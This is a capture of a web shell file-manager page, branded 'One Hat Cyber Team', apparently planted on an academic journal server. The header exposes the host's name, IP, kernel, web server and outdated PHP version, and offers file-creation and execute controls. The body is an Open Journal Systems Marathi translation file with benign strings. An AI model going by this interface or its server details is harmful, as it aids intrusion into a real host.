One Hat Cyber Team
Your IP :
216.73.216.115
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
Buat Folder
Eksekusi
Dir :
var
www
ojs-nosc
locale
mr
Edit File:
default.po
या नियतकालिकामध्ये सादरीकरणासाठी लेखकांना आमंत्रित केले आहे. सगळी " "सादरीकरणे या नियतकालिकाच्या उद्दिष्टे आणि व्याप्तीशी निगडित आहेत की नाही हे " "ठरवण्यासाठी संपादकाद्वारे मूल्यमापन केले जाईल. उद्दिष्टांशी आणि व्याप्तीशी " "जुळणारी सादरीकरणे स्वीकारायची की नाही हे ठरवण्यापूर्वी ती विषयतज्ज्ञांकडे " "समीक्षणासाठी पाठवली जातील.
सादरीकरणापूर्वी, सादरीकरणात समाविष्ट केलेली " "कोणतीही सामग्री; जसे छायाचित्र, दस्तऐवज आणि डेटासेट प्रकाशित करण्याची परवानगी" " मिळविण्याची जबाबदारी लेखकांची आहे. सादरीकरणावर नमूद केल्या गेलेल्या सर्व " "लेखकांनी लेखक या नात्याने संमती देणे आवश्यक आहे. आवश्यक तेथे, ज्या देशात संशो" "धन झालेले असेल त्या देशाच्या विधिसंमत आवश्यकतांनुसार संशोधनास योग्य त्या " "नैतिकता समितीने मान्यता दिली पाहिजे.
सादरीकरणात किमान गुणवत्तेच्या " "मानकांची पूर्तता केलेली नसेल तर त्याचा अस्वीकार संपादक करु शकतात. लेख " "सादरीकरणापूर्वी, अभ्यासाची मांडणी आणि संशोधनाची कारणमीमांसा लेखनात " "योग्यरित्या संरचित आणि स्पष्टपणे केली आहे याची कृपया खात्री करा. शीर्षक " "संक्षिप्त आणि गोषवारा अभ्यासाची पूर्ण कल्पना देणारा असावा. यामुळे लेखनाचे " "समीक्षण करण्यास समीक्षकांची सहमती मिळवण्याची शक्यता वाढते. जेव्हा तुम्हाला " "असे खात्रीने वाटेल की तुमचे सादरीकरण या सगळ्या अपेक्षा पूर्ण करत आहे तेव्हा " "कृपया खालील यादीक्रमाने (चेकलिस्ट) सादरीकरणाची प्रक्रिया सुरु करा.
" msgid "default.contextSettings.checklist" msgstr "" "
सर्व सादरीकरणांनी खालील आवश्यकतांची पूर्तता केली पाहिजे.
हे " "सादरीकरण <a href=\"{$submissionGuidelinesUrl}\">लेखकांसाठी असलेल्या मार्गदर्" "शक तत्त्वांची पूर्तता करते.
हे सादरीकरण यापूर्वी प्रकाशित केलेले " "नाही किंवा ते प्रकाशनार्थ दुसऱ्या नियतकालिकाला पाठवलेले नाही.
सगळे " "संदर्भ अचूकता आणि पूर्णतेसाठी तपासलेले आहेत.
तक्ते आणि आकृत्यांना " "क्रमांक देऊन त्यांचे संक्षिप्त वर्णन केले आहे.
या सादरीकरणात वापरलेली" " छायाचित्रे, डेटासेट आणि इतर सामग्री प्रकाशित करण्यासाठी परवानगी मिळवली " "आहे.
" msgid "default.contextSettings.forReaders" msgstr "" "आमच्या सूचना सेवेद्वारे या नियतकालिकातील प्रकाशित साहित्याची माहिती " "मिळवण्यासाठी वाचकांना नावनोंदणी (साइन अप) करण्यास आम्ही प्रोत्साहन देतो. " "याकरता नियतकालिकाच्या मुख्यपृष्ठाच्या शीर्षस्थानी <a href=\"" "{$indexUrl}/{$contextPath}/user/register\">नोंदणी करा हा दुवा (लिंक) " "वापरा. या नोंदणीमुळे वाचकांना नियतकालिकाच्या प्रत्येक नव्याने प्रसिद्ध " "झालेल्या अंकातली अनुक्रमणिका ई-मेलद्वारे मिळेल. या यादीमुळे नियतकालिकाचे किती" " नियमित वाचकांचा पाठिंबा आहे याचा अंदाज बांधता येतो. नियतकालिकाच्या <a href=" "\"{$indexUrl}/{$contextPath}/about/submissions#privacyStatement\">गोपनीयता " "विधानाद्वारे वाचकांचे नाव आणि ई-मेल पत्ता इतर हेतूंसाठी वापरला जाणार नाही" " याचे आम्ही वाचकांना आश्वासन देतो." msgid "default.contextSettings.forLibrarians" msgstr "" "आम्ही संशोधन संस्थांमधील ग्रंथपालांना त्यांच्या 'इलेक्ट्रॉनिक जर्नल " "होल्डिंग'मध्ये हे नियतकालिक समाविष्ट करावे अशी विनंती करतो. तसेच, " "ग्रंथालयाच्या प्राध्यापक सदस्यांचे त्यांच्या नियतकालिकांना इंटरनेटवर स्थान " "देण्यासाठी हे नियतकालिक वापरत असलेल्या <a href=\"https://pkp.sfu.ca/ojs\"" ">मुक्त स्रोत प्रकाशन प्रणाली (ओपन जर्नल सिस्टम्स)  कडे आम्ही लक्ष वेधतो." msgid "default.contextSettings.clockssLicense" msgstr "" "हे नियतकालिक वितरित संग्रहण प्रणालीचा (CLOCKSS) वापर करते ज्यायोगे सहभागी " "ग्रंथालयांना यातील लेखन कायमस्वरूपी उपलब्ध असेल. तसेच त्याला जतन आणि " "पुनर्संचयित करण्याच्या हेतूने नियतकालिकाचे कायमस्वरूपी संग्रह तयार करण्याची " "परवानगी देते. <a href=\"https://clockss.org\">अधिक माहितीसाठी..." msgid "section.default.title" msgstr "लेख" msgid "section.default.abbrev" msgstr "ART" msgid "section.default.policy" msgstr "विभागाविषयी सर्वसाधारण (डिफॉल्ट) धोरण" msgid "default.genres.article" msgstr "लेखाचा मजकूर" msgid "default.contextSettings.privacyStatement" msgstr "" "
या नियतकालिकाच्या संकेतस्थळावर नोंदवलेली नावे आणि ई-मेल पत्ते केवळ या " "नियतकालिकाच्या नमूद केलेल्या उद्देशांव्यतिरिक्त इतर कोणत्याही हेतूसाठी वापरले" " किंवा इतरांना उपलब्ध केले जाणार नाहीत.
" msgid "default.contextSettings.openAccessPolicy" msgstr "" "संशोधनाला मुक्तपणे वाचकांसाठी उपलब्ध करून दिल्यामुळे ज्ञानाच्या देवाणघेवाणीला" " जागतिक स्तरावर चालना मिळते या सिद्धांतानुसार हे नियतकालिक त्यात प्रसिद्ध " "झालेल्या लेखनाला त्वरित मुक्तपणे उपलब्ध करते." msgid "default.contextSettings.forAuthors" msgstr "" "या नियतकालिकात सादरीकरण करायचे आहे? तुम्ही नियतकालिकातील विभाग आणि त्यांच्या " "धोरणांबाबतचे आकलन करुन घेण्यासाठी <a href=\"{$indexUrl}/{$contextPath}/" "about\">नियतकालिकाबद्दल तसेच <a href=\"{$indexUrl}/{$contextPath}/about/" "submissions#authorGuidelines\">लेखक मार्गदर्शक तत्त्वे येथील मजकूर वाचावा" " असे आम्ही सुचवतो. लेखकांनी सादरीकरणापूर्वी नियतकालिकात <a href=\"" "{$indexUrl}/{$contextPath}/user/register\">नोंदणी करणे आवश्यक आहे. पूर्वी" " नोंदणी केलेली असल्यास, फक्त <a href=\"{$indexUrl }/index/login\">लॉग-इन " "करा आणि पाच टप्प्यांची कार्यपद्धती वापरुन सादरीकरण प्रक्रिया सुरू करा." msgid "default.contextSettings.lockssLicense" msgstr "" "हे नियतकालिक वितरित संग्रहण प्रणालीचा (LOCKSS) वापर करते ज्यायोगे सहभागी " "ग्रंथालयांना यातील लेखन कायमस्वरूपी उपलब्ध असेल. तसेच त्याला जतन आणि " "पुनर्संचयित करण्याच्या हेतूने नियतकालिकाचे कायमस्वरूपी संग्रह तयार करण्याची " "परवानगी देते. <a href=\"https://www.lockss.org\">अधिक माहितीसाठी..." msgid "default.groups.name.manager" msgstr "नियतकालिकाचा व्यवस्थापक" msgid "default.groups.plural.manager" msgstr "नियतकालिकाचे व्यवस्थापक" msgid "default.groups.abbrev.manager" msgstr "JM" msgid "default.groups.name.editor" msgstr "नियतकालिकाचा संपादक" msgid "default.groups.plural.editor" msgstr "नियतकालिकाचे संपादक" msgid "default.groups.abbrev.editor" msgstr "JE" msgid "default.groups.name.guestEditor" msgstr "अतिथी संपादक" msgid "default.groups.plural.guestEditor" msgstr "अतिथी संपादक मंडळ" msgid "default.groups.abbrev.guestEditor" msgstr "GE" msgid "default.groups.name.sectionEditor" msgstr "विभागाचा संपादक" msgid "default.groups.plural.sectionEditor" msgstr "विभागाचे संपादक" msgid "default.groups.abbrev.sectionEditor" msgstr "SecE" msgid "default.groups.name.subscriptionManager" msgstr "वर्गणी/सदस्यता व्यवस्थापक" msgid "default.groups.plural.subscriptionManager" msgstr "वर्गणी/सदस्यता व्यवस्थापक मंडळ" msgid "default.groups.abbrev.subscriptionManager" msgstr "SubM" msgid "default.genres.researchInstrument" msgstr "संशोधन साधने" msgid "default.genres.researchMaterials" msgstr "संशोधन सामग्री" msgid "default.genres.researchResults" msgstr "संशोधन निष्पत्ती" msgid "default.genres.transcripts" msgstr "प्रतिलेख (ट्रान्स्क्रिप्ट)" msgid "default.genres.dataAnalysis" msgstr "विदा (डेटा) विश्लेषण" msgid "default.genres.dataSet" msgstr "विदा (डेटा) संच" msgid "default.genres.sourceTexts" msgstr "मजकूराचा स्रोत" msgid "default.groups.name.externalReviewer" msgstr "समीक्षक" msgid "default.groups.plural.externalReviewer" msgstr "समीक्षक" msgid "default.groups.abbrev.externalReviewer" msgstr "R"
Simpan